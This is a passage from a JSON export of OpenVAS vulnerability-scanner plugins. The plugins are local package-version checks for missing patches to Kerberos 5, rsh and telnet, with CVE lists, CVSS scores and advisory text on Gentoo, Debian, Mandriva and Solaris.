["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54987", "id": "OPENVAS:54987", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MIT Kerberos 5 is vulnerable to a Denial of Service attack and remote\nexecution of arbitrary code, possibly leading to the compromise of the\nentire Kerberos realm.\";\ntag_solution = \"All MIT Kerberos 5 users should upgrade to the latest available version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.4.1-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200507-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=98799\nhttp://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-002-kdc.txt\nhttp://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-003-recvauth.txt\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200507-11.\";\n\n \n\nif(description)\n{\n script_id(54987);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200507-11 (mit-krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-crypt/mit-krb5\", unaffected: make_list(\"ge 1.4.1-r1\"), vulnerable: make_list(\"lt 1.4.1-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:25", "description": "The remote host is missing an update to krb5\nannounced via advisory DSA 757-1.\n\nDaniel Wachdorf reported two problems in the MIT krb5 distribution used\nfor network authentication. First, the KDC program from the krb5-kdc\npackage can corrupt the heap by trying to free memory which has already\nbeen freed on receipt of a certain TCP connection. This vulnerability\ncan cause the KDC to crash, leading to a denial of service.\n[CVE-2005-1174] Second, under certain rare circumstances this type of\nrequest can lead to a buffer overflow and remote code execution.\n[CVE-2005-1175]\n\nAdditionally, Magnus Hagander reported another problem in which the\nkrb5_recvauth function can in certain circumstances free previously\nfreed memory, potentially leading to the execution of remote code.\n[CVE-2005-1689]\n\nAll of these vulnerabilities are believed difficult to exploit, and no\nexploits have yet been discovered.\n\nFor the old stable distribution (woody), these problems have been fixed\nin version 1.2.4-5woody10. Note that woody's KDC does not have TCP\nsupport and is not vulnerable to CVE-2005-1174.", "edition": 2, "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 757-1 (krb5)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54373", "id": "OPENVAS:54373", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_757_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 757-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge), these problems have been fixed in\nversion 1.3.6-2sarge2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.6-4.\n\nWe recommend that you upgrade your krb5 package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20757-1\";\ntag_summary = \"The remote host is missing an update to krb5\nannounced via advisory DSA 757-1.\n\nDaniel Wachdorf reported two problems in the MIT krb5 distribution used\nfor network authentication. First, the KDC program from the krb5-kdc\npackage can corrupt the heap by trying to free memory which has already\nbeen freed on receipt of a certain TCP connection. This vulnerability\ncan cause the KDC to crash, leading to a denial of service.\n[CVE-2005-1174] Second, under certain rare circumstances this type of\nrequest can lead to a buffer overflow and remote code execution.\n[CVE-2005-1175]\n\nAdditionally, Magnus Hagander reported another problem in which the\nkrb5_recvauth function can in certain circumstances free previously\nfreed memory, potentially leading to the execution of remote code.\n[CVE-2005-1689]\n\nAll of these vulnerabilities are believed difficult to exploit, and no\nexploits have yet been discovered.\n\nFor the old stable distribution (woody), these problems have been fixed\nin version 1.2.4-5woody10. Note that woody's KDC does not have TCP\nsupport and is not vulnerable to CVE-2005-1174.\";\n\n\nif(description)\n{\n script_id(54373);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-1689\", \"CVE-2005-1174\", \"CVE-2005-1175\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 757-1 (krb5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.2.4-5woody10\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-doc\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-clients\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-telnetd\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkadm55\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb5-dev\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-rsh-server\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-ftpd\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libkrb53\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-admin-server\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-user\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"krb5-kdc\", ver:\"1.3.6-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:14", "description": "Check for the Version of rsh", "edition": 2, "published": "2009-04-09T00:00:00", "title": "Mandriva Update for rsh MDVSA-2008:191 (rsh)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0175"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830694", "id": "OPENVAS:830694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for rsh MDVSA-2008:191 (rsh)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in the rcp protocol was discovered that allows a\n server to instruct a client to write arbitrary files outside of the\n current directory, which could potentially be a security concern if\n a user used rcp to copy files from a malicious server (CVE-2004-0175).\n\n This issue was originally corrected in MDKSA-2005:100, but the patch\n had not been applied to the development tree, so released packages\n after that date did not have the fix applied.\n \n This update also corrects an issue where rexecd did not honor settings\n in /etc/security/limits if pam_limits was in use.\";\n\ntag_affected = \"rsh on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00008.php\");\n script_id(830694);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2008:191\");\n script_cve_id(\"CVE-2004-0175\");\n script_name( \"Mandriva Update for rsh MDVSA-2008:191 (rsh)\");\n\n script_summary(\"Check for the Version of rsh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~16.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~16.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~16.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~16.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~18.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~19.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~18.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~19.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~20.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~20.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T11:41:51", "description": "Check for the Version of rsh", "edition": 2, "published": "2009-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for rsh MDVSA-2008:191 (rsh)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0175"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830694", "id": "OPENVAS:1361412562310830694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for rsh MDVSA-2008:191 (rsh)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in the rcp protocol was discovered that allows a\n server to instruct a client to write arbitrary files outside of the\n current directory, which could potentially be a security concern if\n a user used rcp to copy files from a malicious server (CVE-2004-0175).\n\n This issue was originally corrected in MDKSA-2005:100, but the patch\n had not been applied to the development tree, so released packages\n after that date did not have the fix applied.\n \n This update also corrects an issue where rexecd did not honor settings\n in /etc/security/limits if pam_limits was in use.\";\n\ntag_affected = \"rsh on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00008.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830694\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2008:191\");\n script_cve_id(\"CVE-2004-0175\");\n script_name( \"Mandriva Update for rsh MDVSA-2008:191 (rsh)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of rsh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~16.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~16.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~16.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~16.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~18.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~19.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~18.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~19.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"rsh\", rpm:\"rsh~0.17~20.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rsh-server\", rpm:\"rsh-server~0.17~20.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:55", "description": "Check for the Version of telnet", "edition": 1, "published": "2009-06-03T00:00:00", "title": "Solaris Update for telnet 119434-01", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855053", "id": "OPENVAS:855053", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 119434-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855053);\n script_version(\"$Revision: 5359 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"119434-01\");\n script_name( \"Solaris Update for telnet 119434-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-119434-01-1\");\n\n script_summary(\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"119434-01\", package:\"SUNWtnetc\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:38:49", "description": "Check for the Version of telnet", "edition": 2, "published": "2009-06-03T00:00:00", "title": "Solaris Update for telnet 110669-05", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855072", "id": "OPENVAS:1361412562310855072", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 110669-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855072\");\n script_version(\"$Revision: 9370 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"110669-05\");\n script_name( \"Solaris Update for telnet 110669-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-110669-05-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 